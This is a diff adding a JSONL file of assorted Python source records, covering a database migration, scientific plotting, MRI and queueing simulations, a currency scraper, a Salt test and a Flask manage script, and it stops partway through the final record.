diff --git "a/4795.jsonl" "b/4795.jsonl" new file mode 100644--- /dev/null +++ "b/4795.jsonl" @@ -0,0 +1,720 @@ +{"seq_id":"400216248","text":"from opengever.core.upgrade import SchemaMigration\nfrom plone import api\nfrom sqlalchemy import Column\nfrom sqlalchemy import Text\nfrom sqlalchemy.sql.expression import column\nfrom sqlalchemy.sql.expression import table\n\n\nmeeting_table = table(\"meetings\",\n column(\"id\"),\n column(\"title\"),\n column(\"location\"),\n column(\"start_datetime\"))\n\n\nclass AddTitleColumnToMeeting(SchemaMigration):\n \"\"\"Add title column to meeting.\n \"\"\"\n\n def migrate(self):\n self.add_column()\n self.migrate_data()\n self.make_column_non_nullable()\n\n def add_column(self):\n self.op.add_column(\n 'meetings',\n Column('title', Text, nullable=True))\n\n def migrate_data(self):\n for meeting in self.execute(meeting_table.select()):\n self._set_title(meeting)\n\n def _set_title(self, meeting):\n self.execute(meeting_table\n .update()\n .where(meeting_table.c.id == meeting.id)\n .values(title=self._generate_title(meeting)))\n\n def _generate_title(self, meeting):\n date = api.portal.get_localized_time(datetime=meeting.start_datetime)\n if meeting.location:\n return u\"{}, {}\".format(meeting.location, date)\n return date\n\n def make_column_non_nullable(self):\n self.op.alter_column('meetings', 'title',\n existing_type=Text, nullable=False)\n","sub_path":"opengever/meeting/upgrades/20160218114243_add_title_column_to_meeting/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"303409155","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom cycler import cycler\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport sys\nfrom os.path import exists\n\n\nsys.path.append(\"..\")\nfrom importar_datos import importar_mag_1s, importar_swea, importar_swia\nfrom funciones import Bpara_Bperp, UTC_to_hdec, donde\n\nplt.rcParams[\"axes.prop_cycle\"] = cycler(\n \"color\",\n [\"#003f5c\", \"#ffa600\", \"#de425b\", \"#68abb8\", \"#f3babc\", \"#6cc08b\", \"#cacaca\"],\n)\n\nfor grupo in [1, 2, 3, 4]:\n # grupo = input(\"grupo\\n\")\n lista = np.genfromtxt(\n f\"../outputs/grupo{grupo}/jacob_dayside.txt\", skip_header=1, dtype=str\n )\n fig_path = f\"../../Pictures/BS_MPB/grupo{grupo}_Jacob/\"\n\n for l in lista:\n year, month, day = l[0].split(\"-\")\n if not exists(\n fig_path + f\"{year}-{month}-{day}-{l[1]}.png\"\n ): # si no está ya la figura\n t_1 = UTC_to_hdec(l[1])\n t_mpb = UTC_to_hdec(l[2])\n t_2 = UTC_to_hdec(l[3])\n\n if t_1 < t_mpb:\n ti = t_1 - 0.5\n tf = t_mpb + 0.5\n else:\n ti = t_mpb - 0.5\n tf = t_1 + 0.5\n if ti < 0:\n ti = 0\n if tf > 24:\n tf = 24\n\n mag, t, B, pos = importar_mag_1s(year, month, day, ti, tf)\n swea, t_swea, energia, flux_plot = importar_swea(year, month, day, ti, tf)\n swia, t_swia, i_density, i_temp, vel_mso = importar_swia(\n year, month, day, ti, tf\n )\n energias = [50 + i * 25 for i in range(6)]\n if type(t_swea) != int:\n JE_pds = np.zeros((len(t_swea), len(energias)))\n\n for i, e in enumerate(energias):\n j = donde(energia, e)\n JE_pds[:, i] = flux_plot[j]\n else:\n JE_pds = 0\n\n Bnorm = np.linalg.norm(B, axis=1)\n Bpara, Bperp, tpara = Bpara_Bperp(B, t, ti, tf)\n\n plt.clf()\n fig = plt.figure(1, constrained_layout=True)\n fig.subplots_adjust(\n top=0.95,\n bottom=0.1,\n left=0.05,\n right=0.95,\n hspace=0.005,\n wspace=0.15,\n )\n 
plt.title(\"Spacebar when ready to click:\")\n\n ax1 = plt.subplot2grid((3, 2), (0, 0))\n ax2 = plt.subplot2grid((3, 2), (1, 0), sharex=ax1)\n ax3 = plt.subplot2grid((3, 2), (2, 0), sharex=ax1)\n ax4 = plt.subplot2grid((3, 2), (0, 1), sharex=ax1)\n ax5 = plt.subplot2grid((3, 2), (1, 1), sharex=ax1)\n ax6 = plt.subplot2grid((3, 2), (2, 1), sharex=ax1)\n\n ax1.plot(tpara, Bpara, label=r\"|$\\Delta B \\parallel$| / B\")\n ax1.plot(tpara, Bperp, \"-.\", label=r\"|$\\Delta B \\perp$| / B\")\n plt.setp(ax1.get_xticklabels(), visible=False)\n ax1.set_ylabel(r\"|$\\Delta B$|/ B\")\n ax1.set_xlim([t[0], t[-1]])\n if max(Bpara) > 1:\n ax1.set_ylim([-0.1, 1])\n ax1.grid()\n ax1.legend()\n ax1.set_title(f\"{year}-{month}-{day}\")\n\n ax2.plot(t, B)\n plt.setp(ax2.get_xticklabels(), visible=False)\n ax2.set_ylabel(\"Bx, By, Bz (nT)\")\n ax2.legend([\"Bx\", \"By\", \"Bz\"])\n ax2.grid()\n\n ax3.plot(t, Bnorm)\n ax3.grid()\n if max(Bnorm) > 70 and Bnorm[donde(t, t_mpb)] < 40:\n ax2.set_ylim([-50, 50])\n ax3.set_ylim([0, 50])\n if Bnorm[donde(t, t_mpb)] < 20:\n ax2.set_ylim([-20, 20])\n ax3.set_ylim([0, 30])\n elif max(Bnorm) > 70 and Bnorm[donde(t, t_mpb)] > 40:\n ax2.set_ylim([-100, 100])\n ax3.set_ylim([0, 100])\n ax3.axvline(x=t_1, color=\"c\")\n ax3.set_ylabel(\"|B| (nT)\")\n ax3.set_xlabel(\"Tiempo (hdec)\")\n\n plt.setp(ax4.get_xticklabels(), visible=False)\n ax4.set_xlabel(\"Tiempo (hdec)\")\n ax4.set_ylabel(\"proton velocity\")\n ax4.plot(t_swia, vel_mso)\n ax4.grid()\n\n plt.setp(ax5.get_xticklabels(), visible=False)\n ax5.set_ylabel(\"Densidad de p+ \\n del SW (cm⁻³)\")\n ax5.plot(t_swia, i_density)\n if type(i_density) != int:\n if max(i_density) > 30 and i_density[donde(t_swia, t_mpb)] < 20:\n ax5.set_ylim([-0.1, 20])\n ax5.grid()\n\n ax6.semilogy(t_swea, JE_pds)\n ax6.legend(energias, loc=\"upper right\")\n ax6.grid()\n ax6.set_ylabel(\"Diff. en. 
flux\")\n # if swea != 0:\n # ax6.set_ylabel(\"Energia\", picker=True) # , bbox=dict(facecolor='red'))\n # plt.setp(ax6.get_xticklabels(), visible=False)\n # im = plt.imshow(\n # flux_plot,\n # aspect=\"auto\",\n # origin=\"lower\",\n # extent=(t_swea[0], t_swea[-1], energia[-1], energia[0]),\n # cmap=\"inferno\",\n # norm=LogNorm(vmin=1e4, vmax=1e9),\n # )\n # divider = make_axes_locatable(ax6)\n # cax = divider.append_axes(\"top\", size=\"7%\", pad=\"1%\")\n # cb = plt.colorbar(im, cax=cax, orientation=\"horizontal\")\n # cax.xaxis.set_ticks_position(\"top\")\n\n for ax in [ax1, ax2, ax3, ax4, ax5, ax6]:\n ax.axvline(x=t_1, c=\"m\", label=\"t1\")\n ax.axvline(x=t_2, c=\"b\", label=\"t2\")\n ax.axvline(x=t_mpb, c=\"g\", label=\"mpb\")\n\n figure = plt.gcf() # get current figure\n figure.set_size_inches(16, 8)\n # when saving, specify the DPI\n plt.savefig(fig_path + f\"{year}-{month}-{day}-{l[1]}.png\", dpi=150)\n # plt.show()\n","sub_path":"bs_mpb/graficador.py","file_name":"graficador.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"65123898","text":"from scipy.interpolate import LSQUnivariateSpline\nfrom scipy.stats import mode\nimport collections\nfrom python.mri_python.varian_read_file import *\nfrom itertools import combinations\nfrom numpy.fft import *\nfrom scipy.linalg import lstsq\n\ndef phase_drift_corr(inputAcq,petable,imouse=None,petable_arrays=('t1','t2')):\n if (inputAcq.platform!=\"Varian\"):\n \"Function phase_drift_corr only functions for Varian acquisitions...\"\n raise SystemExit\n print('Estimating smoothed phase drift correction...')\n #get repeated k0 grabs\n nacq = int(get_dict_value(inputAcq.param_dict,'np',1)/2)\n nro = int(get_dict_value(inputAcq.param_dict,'nro',1))\n etl = int(get_dict_value(inputAcq.param_dict,'etl',1))\n nrcvrs = inputAcq.nrcvrs\n nmice = inputAcq.nmice\n if (nmice>nrcvrs):\n nmice=nrcvrs\n t1_array = parse_petable_file(petable,petable_arrays[0])\n t2_array = parse_petable_file(petable,petable_arrays[1])\n i1 = nonzero( (t1_array==0)*(t2_array==0) )[0]\n if (len(i1)<20):\n print('Too few k0 grabs for phase drift correction...')\n return ones(len(t1_array),float)\n if (etl>1):\n print('Phase drift correction not ready for etl>1...')\n return zeros(len(t1_array),float)\n if (imouse==None):\n mouselist = range(nmice)\n else:\n mouselist = [imouse]\n k0_data = zeros((len(mouselist), len(i1), nacq), complex)\n for k in range(len(mouselist)):\n for j in range(len(i1)):\n fid_data,data_error = inputAcq.getdatafids(i1[j],i1[j]+1,rcvrnum=k)\n k0_data[k,j,:]=fid_data.copy()\n #evaluate phase drift from k0 grabs\n maxind = k0_data.shape[-1]-nro+argmax(abs(k0_data[0,0,-nro:]),axis=-1)\n phasecorr = zeros((len(mouselist),len(t2_array)),complex)\n Nacqs = len(t2_array)\n i1mod = append(i1,len(t2_array)) \n for j in range(k0_data.shape[0]):\n refangles = unwrap(angle( k0_data[j,:,maxind] ))\n refangles = append(refangles,median(refangles[-11::])) # artificially add a last point to limit \n # behaviour at the end\n splsmooth = LSQUnivariateSpline(i1mod,refangles,t=arange(Nacqs/3,int(0.8*Nacqs),Nacqs/3))\n smoothphase = splsmooth(arange(Nacqs))\n smoothphase = median(smoothphase)-smoothphase #this flips the sign\n phasecorr[j,:] = exp(1.j*smoothphase)\n return phasecorr\n\n\ndef get_corrected_datafids(inputAcq,fid_start,fid_end,mouse_num=0,phasecorr=None,dcpl_info=None,dcpl_ppe_index=0):\n if (inputAcq.platform!=\"Varian\"):\n \"Function 
get_corrected_datafids only functions for Varian acquisitions...\"\n raise SystemExit\n if ((dcpl_info is None) and (phasecorr is None)): #no corrections to apply\n fid_data,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=mouse_num)\n elif (dcpl_info is None) and (phasecorr is not None):\n fid_data,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=mouse_num)\n fid_data = fid_data*phasecorr[mouse_num,fid_start:fid_end,newaxis]\n else:\n cgrp = nonzero( abs(dcpl_info.invCij[mouse_num,:])>1e-4 )[0]\n #start = dcpl_info.rok0index-dcpl_info.nro/2\n #end = start+dcpl_info.nro\n np = inputAcq.header_info[2]\n fid_data = zeros((fid_end-fid_start,int(np/2)),complex) #dcpl_info.nro\n for j in cgrp:\n cfid,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=j)\n fid_data += cfid[:,:]* \\\n dcpl_info.invCij[mouse_num,j]* \\\n exp(-1.j*2*pi*(arange(cfid.shape[-1])-dcpl_info.rok0index)*dcpl_info.roposition[j]/dcpl_info.nro)* \\\n exp(1.j*dcpl_info.ppeshift[j]*dcpl_ppe_index)\n if (phasecorr is not None):\n fid_data = fid_data*phasecorr[mouse_num,fid_start:fid_end,newaxis] \n if (data_error):\n print('Unable to retrieve all fids (%d,%d)...' % (fid_start,fid_end))\n return fid_data\n\n\n\ndef rep_pos_corr(inputAcq,petable,imouse=None,petable_arrays=('t1','t2'),corrmat=64,phasedriftcorr=None):\n if (inputAcq.platform!=\"Varian\"):\n \"Function get_corrected_datafids only functions for Varian acquisitions...\"\n raise SystemExit\n print('Estimating position shift between reps...')\n nacq = int(get_dict_value(inputAcq.param_dict,'np',1))/2\n nro = int(get_dict_value(inputAcq.param_dict,'nro',1))\n etl = int(get_dict_value(inputAcq.param_dict,'etl',1))\n nv = int(get_dict_value(inputAcq.param_dict,'nv',1))\n nv2 = int(get_dict_value(inputAcq.param_dict,'nv2',1))\n grappafov = int(get_dict_value(inputAcq.param_dict,'grappafov',1))\n t1_array = parse_petable_file(petable,petable_arrays[0])\n t2_array = parse_petable_file(petable,petable_arrays[1])\n i1 = nonzero( (t1_array/grappafov>-corrmat/2)*(t1_array/grappafov<=corrmat/2)* \\\n (t2_array/grappafov>-corrmat/2)*(t2_array/grappafov<=corrmat/2)* \\\n (t1_array%grappafov==0)*(t2_array%grappafov==0) )[0]\n noutreps = int( mode(array( collections.Counter(t1_array[i1]+nv/2-1+nv*(t2_array[i1]+nv2/2-1)).most_common() )[:,1])[0][0] )\n if (etl>1):\n print('Correction not ready for etl>1...')\n return ones(len(t1_array),float)\n if (imouse==None):\n mouselist = range(inputAcq.nmice)\n else:\n mouselist = [imouse]\n if (phasedriftcorr==None):\n phasedriftcorr=ones((len(mouselist),len(t1_array)),float)\n kdata = zeros((len(mouselist),noutreps,corrmat,corrmat,nacq),complex)\n for k in range(len(mouselist)):\n for q in range(corrmat):\n for r in range(corrmat):\n inds = i1[ nonzero( (t1_array[i1]==(r-corrmat/2+1)*grappafov)*(t2_array[i1]==(q-corrmat/2+1)*grappafov) )[0] ]\n repstep = len(inds)/noutreps\n for j in range(len(inds)):\n fid_data,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=k)\n kdata[k,[noutreps-1,j/repstep][j/repstep=noutreps,noutreps-1,repind)\n for j in range(len(mouselist)):\n p=zeros((2*noutreps,),float)\n peshifts=PEadjustment(kplanes[j,:,:,:])\n delphase = exp(1.j*2*pi*(arange(nv2)-nv2/2)[newaxis,:]*peshifts[:,0,newaxis]/corrmat)[:,:,newaxis]* \\\n exp(1.j*2*pi*(arange(nv)-nv/2)[newaxis,:]*peshifts[:,1,newaxis]/corrmat)[:,newaxis,:]\n phasedriftcorr[j,:] = phasedriftcorr[j,:]*delphase[repind,t2_array/grappafov+nv2/2-1,t1_array/grappafov+nv/2-1]\n print(\"PE2 pixel shifts (image %d): 
\"%mouselist[j],peshifts[:,0]*float(nv2)/float(corrmat))\n print(\"PE1 pixel shifts (image %d): \"%mouselist[j],peshifts[:,1]*float(nv)/float(corrmat))\n return phasedriftcorr \n\n\ndef PEshift(kplane1,kplane2,retpixshift=True):\n # need to select planes instead of lines\n angdiff = angle(kplane1*conj(kplane2))\n A=ones((prod(angdiff.shape),3),float)\n A[:,0]=arange(prod(angdiff.shape))/angdiff.shape[1]-angdiff.shape[0]/2\n A[:,1]=arange(prod(angdiff.shape))%angdiff.shape[1]-angdiff.shape[1]/2 \n x,resids,rank,s = lstsq(A,ravel(angdiff))\n if (retpixshift):\n return x[0]*angdiff.shape[0]/(2*pi),x[1]*angdiff.shape[1]/(2*pi)\n else:\n return x\n\n\ndef PEadjustment(kmdata):\n pepos = zeros((kmdata.shape[0],2),float)\n A = array([],float); b = array([],float); w = array([],float)\n for j in range(2):\n Arow = zeros((2*kmdata.shape[0],),float); Arow[j::2] = 1.0\n A = append(A,Arow)\n b = append(b,0)\n for q in combinations(arange(kmdata.shape[0]),2):\n pe2shift,pe1shift = PEshift(kmdata[q[0]],kmdata[q[1]])\n Arow = zeros((2*kmdata.shape[0],),float); \n Arow[2*q[0]] = 1; Arow[2*q[1]] = -1\n A = append(A,Arow); b = append(b,pe2shift); \n Arow = zeros((2*kmdata.shape[0],),float); \n Arow[2*q[0]+1] = 1; Arow[2*q[1]+1] = -1\n A = append(A,Arow); b = append(b,pe1shift); \n A.shape = (len(b),len(A)/len(b))\n pefitpos,resids,rank,s = lstsq(A,b)\n pefitpos.shape=(kmdata.shape[0],2)\n return -1*pefitpos\n\n \n","sub_path":"python/mri_python/varian_fid_corrections.py","file_name":"varian_fid_corrections.py","file_ext":"py","file_size_in_byte":8672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"450974208","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\nimport math\n\nimport socket\nimport struct\nimport sys\nimport threading\n\nangles = [0,0,0]\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(('0.0.0.0', 6000))\ns.listen(0)\nclient, addr = s.accept()\nclient.settimeout(5)\n\nangles = [0,0,0]\n\ndef get_data(client):\n global angles \n while(1):\n content = client.recv(1024)\n angles_temp = []\n if len(content) == 73:\n for j in [10,11,12]:\n float_bytes = ''\n for k in range(4):\n float_bytes = float_bytes + '%.2x'%(content[(3-k)+j*4])\n float_data = struct.unpack('!f', bytes.fromhex(float_bytes))[0]\n angles_temp.append(float_data)\n angles = angles_temp\n else:\n print('...')\n pass\n\n\nx = threading.Thread(target=get_data, args=(client,))\nx.daemon = True\nx.start()\n\n\n\ndef show3Dpose(vals, ax, lcolor=\"#3498db\", rcolor=\"#e74c3c\"): # blue, orange\n I = np.array([1,2,5,4,6,5]) # start points\n J = np.array([3,3,3,5,5,7]) # end points\n LR = np.array([1,0,1,1,0,0], dtype=bool)\n for i in np.arange( len(I) ):\n x, y, z = [np.array( [vals[I[i], j], vals[J[i], j]] ) for j in range(3)]\n ax.plot(x, y, z, lw=2, c=lcolor if LR[i] else rcolor)\n\n\n#fig = plt.figure(figsize=(19.2, 10.8))\nfig = plt.figure(figsize=(10.8/2, 10.8/2))\nax = Axes3D(fig)\nRADIUS = 200\nax.set_xlim3d([-RADIUS, RADIUS])\nax.set_zlim3d([0, RADIUS*2])\nax.set_ylim3d([-RADIUS, RADIUS])\n\nax.set_xticks([])\nax.set_yticks([])\nax.set_zticks([])\n\nax.get_xaxis().set_ticklabels([])\nax.get_yaxis().set_ticklabels([])\nax.set_zticklabels([])\n\nwhite = (1.0, 1.0, 1.0, 0.0)\nax.w_xaxis.set_pane_color(white)\nax.w_yaxis.set_pane_color(white)\n# Keep z 
pane\n\nax.w_xaxis.line.set_color(white)\nax.w_yaxis.line.set_color(white)\nax.w_zaxis.line.set_color(white)\n\n\n\nvals = np.zeros((10,3))\nvals[1] = [0,-25,0]\nvals[2] = [0,25,0]\nvals[3] = [0,0,100]\nvals[4] = [0,-30,80]\nvals[5] = [0,0,150]\nvals[6] = [0,30,80]\nvals[7] = [0,0,170]\n\nwhile(1):\n t1 = time.time()\n #print(angles[2])\n angle_rad = math.radians(angles[2])\n vals[2,0] = 100 * math.sin(angle_rad)\n vals[2,2] = 100 - 100 * math.cos(angle_rad)\n show3Dpose(vals, ax)\n plt.pause(0.04)\n del ax.lines[:]\n t2 = time.time()\n #print((t2-t1)*1000)\n\nshow3Dpose(vals, ax)\nplt.show()\n\n\n","sub_path":"skeleton_wifi.py","file_name":"skeleton_wifi.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"108486553","text":"# -*- coding: utf-8 -*-\n'''\n :codeauthor: Tyler Johnson (tjohnson@saltstack.com)\n\n\n tests.integration.states.cpan\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'''\n\n# Import python libs\nfrom __future__ import absolute_import, print_function, unicode_literals\nimport logging\n\n# Import Salt Testing libs\nfrom tests.support.case import ModuleCase\nfrom tests.support.helpers import destructiveTest, requires_system_grains\nfrom tests.support.mixins import SaltReturnAssertsMixin\n\n# Import salt libs\nimport salt.utils.path\n\nlog = logging.getLogger(__name__)\n\n__testcontext__ = {}\n\n\n@destructiveTest\nclass CpanStateTest(ModuleCase, SaltReturnAssertsMixin):\n @requires_system_grains\n def setUp(self, grains=None): # pylint: disable=arguments-differ\n '''\n Ensure that cpan is installed through perl\n '''\n super(CpanStateTest, self).setUp()\n if 'cpan' not in __testcontext__:\n # Install perl\n self.assertSaltTrueReturn(self.run_state('pkg.installed', name='perl'))\n # Install cpan or docs\n cpan_docs = 'cpan'\n if grains['os_family'] == 'RedHat':\n cpan_docs = 'perl-CPAN'\n elif grains['os_family'] == 'Arch':\n cpan_docs = 'perl-docs'\n elif grains['os_family'] == 'Debian':\n cpan_docs = 'perl-doc'\n self.assertSaltTrueReturn(self.run_state('pkg.installed', name=cpan_docs))\n # Verify that the cpan binary exists on the system\n self.assertTrue(str(salt.utils.path.which('cpan')).endswith('cpan'), \"cpan not installed\")\n __testcontext__['cpan'] = True\n\n def test_cpan_installed_removed(self):\n '''\n Tests installed and removed states\n '''\n name = 'File::Temp'\n ret = self.run_function('cpan.show', module=name)\n self.assertIsInstance(ret, dict, \"Return value should be a dictionary, instead got: {}\".format(ret))\n version = ret.get('installed version', None)\n if version and (\"not installed\" not in version):\n # For now this is not implemented as state because it is experimental/non-stable\n self.run_function('cpan.remove', (name,))\n\n ret = self.run_state('cpan.installed', name=name)\n self.assertSaltTrueReturn(ret)\n\n # For now this is not implemented as state because it is experimental/non-stable\n self.run_function('cpan.remove', module=name)\n\n def test_missing_cpan(self):\n '''\n Test cpan not being installed on the system\n '''\n module = \"Nonexistant::Module\"\n # Use the name of a binary that doesn't exist\n bin_env = \"no_cpan\"\n ret = self.run_state('cpan.installed', name=module, bin_env=bin_env)\n self.assertSaltFalseReturn(ret)\n self.assertInSaltComment(\n 'Make sure `{}` is installed and in the PATH'.format(bin_env), 
ret)\n","sub_path":"tests/integration/states/test_cpan.py","file_name":"test_cpan.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"410351427","text":"import json\nfrom math import radians, cos, sin, asin, sqrt\nfrom bs4 import BeautifulSoup\nimport requests\n\nCURRENCY_INDEX = {\n (\"buy\", \"USD\"):0,\n (\"sell\", \"USD\"):1,\n (\"buy\", \"EUR\"):2,\n (\"sell\", \"EUR\"):3,\n (\"buy\", \"RUB\"):4,\n (\"sell\", \"RUB\"):5\n}\n\nuser_requests = {}\n\npage_html = requests.get(\"https://myfin.by/currency/minsk\").text \nSOUP_PAGE = BeautifulSoup(page_html, 'html.parser')\nwith open(\"bank_locations.json\", \"r\") as b:\n BANK_LOCATIONS= json.load(b)\n\ndef distance(user_location, bank_location):\n b_lat, b_long = bank_location[\"latitude\"], bank_location[\"longitude\"]\n u_lat, u_long = user_location.latitude, user_location.longitude\n lon1, lat1, lon2, lat2 = map(radians, [b_long, b_lat, u_long, u_lat])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km\n\n\ndef within_km(user_location, bank_location):\n km = distance(user_location, bank_location)\n return km <= 1\n\ndef course_info(bank, operation, curr):\n c_index = CURRENCY_INDEX[(operation, curr)]\n if curr==\"RUB\":\n curr=\"100 RUB\"\n else:\n curr=\"1 \"+curr\n title = bank.select(\"div.ttl > a\")[0].getText()\n phone = bank.select(\"div.tel\")[0].getText()\n address = bank.select(\"div.address\")[0].getText()\n course = \"%s за %s BYN\" % (curr,\n bank.select(\"td > span.first_curr\")[c_index].getText())\n return [title, phone, address, course]\n\n\ndef stringify_response(curr_list, operation):\n response = sorted(curr_list, key=lambda x: x[3])\n if operation == \"buy\":\n response.reverse()\n response = map(\"\\n\".join, response)\n response = map(lambda x: x.strip(), response)#remove empty values from each elem\n response = (\"\\n\"+((\"*\")*26)+\"\\n\").join(response)\n operation = \"БАНКИ ПРОДАЮТ\\n\\n\" if operation=='sell' else \"БАНКИ ПОКУПАЮТ\\n\\n\"\n response = operation+response\n return response\n\n\ndef currency_response(user_location, operation, currency):\n closest_banks = [ad for ad, loc in BANK_LOCATIONS.items() if within_km(user_location, loc)]\n if not closest_banks:\n distances = ((ad, distance(user_location, loc)) for ad, loc in BANK_LOCATIONS.items())\n distances = sorted(distances, key=lambda x: x[1])[0:3]\n closest_banks = [ad[0] for ad in distances]\n banks = SOUP_PAGE.select(\"tr.currency_row_1\")\n unsorted_curr_list = [course_info(b, operation, currency) for b in banks if b.select(\"div.address\")[0].getText() in closest_banks]\n response = stringify_response(unsorted_curr_list, operation)\n return response","sub_path":"currency_parser.py","file_name":"currency_parser.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"576228280","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\n# ##### BEGIN AUTOGENERATED I18N SECTION #####\n\n# Tuple of tuples (key, (sources, comments), (lang, translation, (is_fuzzy, comments)), ...)\ntranslations_tuple = (\n ((None, \"Allows to copy a selection of render settings from current scene to others.\"),\n ((), ()),\n (\"fr\", \"Permet de copier une sélection des réglages de rendu depuis la scène courante vers d’autres scènes.\",\n (False, ())),\n ),\n)\n\ntranslations_dict = {}\nfor msg in translations_tuple:\n key = msg[0]\n for lang, trans, (is_fuzzy, comments) in msg[2:]:\n if trans and not is_fuzzy:\n translations_dict.setdefault(lang, {})[key] = trans\n\n# ##### END AUTOGENERATED I18N SECTION #####\n","sub_path":"render_copy_settings/translations.py","file_name":"translations.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"160121048","text":"import numpy as np\nimport math\nimport scipy.stats as stats\nfrom abc import ABCMeta, abstractmethod\nimport distributions \nimport utils_math\nfrom problems import ABC_problems\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport time\n\n\nclass MG1_Problem(ABC_problems.ABC_Problem):\n\n '''\n The M/G/1 problem with three parameters: ~ [a, a+delta], ~ lambda\n '''\n\n def __init__(self, N=100, n=50):\n\n self.N = N # number of parameter samples\n self.n = n # number of data samples in each simulation\n\n self.prior = [distributions.uniform, distributions.uniform, distributions.uniform]\n self.prior_args = np.array([[0, 4], [2, 6], [0, 0.33]])\n self.simulator_args = ['alpha', 'delta', 'lambda'] # just for information\n self.K = 3 # number of parameters\n\n self.true_alpha = 1\n self.true_delta = 4\n self.true_lambda = 0.2\n\n def get_true_theta(self):\n return np.array([self.true_alpha, self.true_delta, self.true_lambda])\n\n def statistics(self, data, theta=None):\n # quantile as summary statistics\n n_quantiles = 20\n dim = data.shape[1]\n prob = np.linspace(0.025, 0.975, n_quantiles)\n stat = np.zeros([1, n_quantiles*dim])\n for k in range(dim):\n quantiles = stats.mstats.mquantiles(data[:, k], prob)\n stat_k = quantiles\n stat[0, k*n_quantiles : (k+1)*n_quantiles] = np.array(stat_k)\n return stat\n \n def simulator(self, theta):\n # get the params\n Alpha = theta[0]\n Delta = theta[1]\n Lambda = theta[2]\n\n # service times (uniformly distributed)\n sts = distributions.uniform.draw_samples(Alpha, Alpha + Delta, self.n)\n\n # interarrival times (exponentially distributed)\n iats = distributions.exponential.draw_samples(Lambda, self.n)\n\n # arrival times\n ats = np.cumsum(iats)\n\n # interdeparture and departure times\n idts = np.empty(self.n)\n dts = np.empty(self.n)\n\n idts[0] = sts[0] + ats[0]\n dts[0] = idts[0]\n\n for i in range(1, self.n):\n idts[i] = sts[i] + max(0.0, ats[i] - dts[i-1])\n dts[i] = dts[i-1] + idts[i]\n\n return np.atleast_2d(idts).T\n\n def sample_from_prior(self):\n sample_alpha = self.prior[0].draw_samples(self.prior_args[0, 0], self.prior_args[0, 1], 1)[0]\n sample_delta = self.prior[1].draw_samples(self.prior_args[1, 0], self.prior_args[1, 1], 1)[0]\n sample_lambda = 
self.prior[2].draw_samples(self.prior_args[2, 0], self.prior_args[2, 1], 1)[0]\n return np.array([sample_alpha, sample_delta, sample_lambda])\n\n def visualize(self):\n\n # have a look at the problem\n\n plt.figure()\n t = np.linspace(0, self.n, self.n).astype(int)\n x = self.data_obs.reshape(-1)\n plt.rcParams[\"patch.force_edgecolor\"] = True\n n, bins, patches = plt.hist(x, bins=80, facecolor='orchid', alpha=0.5)\n plt.xlabel(r'inter-departure time $\\Delta t$')\n plt.ylabel(r'data y')\n plt.show()","sub_path":"problems/problem_MG1.py","file_name":"problem_MG1.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389628036","text":"from flask.ext.script import Manager, Command, Option\nfrom main.main import app\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import ProgrammingError\nfrom main.database import Base, db_session\nfrom main.Flask_configs import Config, DevConfig\nfrom main.BUser.models import User\nfrom main.BOrder.models import Order\nfrom main.BMeal.models import Meal\nfrom main.BComment.models import Comment\nimport random\nimport requests\nimport datetime\nimport json\n\nmanager = Manager(app)\n\n\nclass Hello(Command):\n \"\"\"prints hello world\"\"\"\n\n def run(self):\n print(\"hello world\")\n\n\nclass InitDB(Command):\n \"\"\"\n Updates database with new models.\n \"\"\"\n\n def __init__(self):\n self.sql_url = Config.SQLALCHEMY_DATABASE_URI\n self.create_engine = create_engine\n self.Base = Base\n\n def run(self):\n self.engine = self.create_engine(self.sql_url, echo=True)\n self.Base.metadata.drop_all(bind=self.engine)\n print(\"Database dropped.\")\n self.Base.metadata.create_all(bind=self.engine)\n print(\"Database created.\")\n\n\nclass PopulateMeals(Command):\n \"\"\"\n Creates fake meals.\n \"\"\"\n def __init__(self):\n pass\n\n def run(self):\n with open('./demo_meals.json', 'r') as f:\n meals = 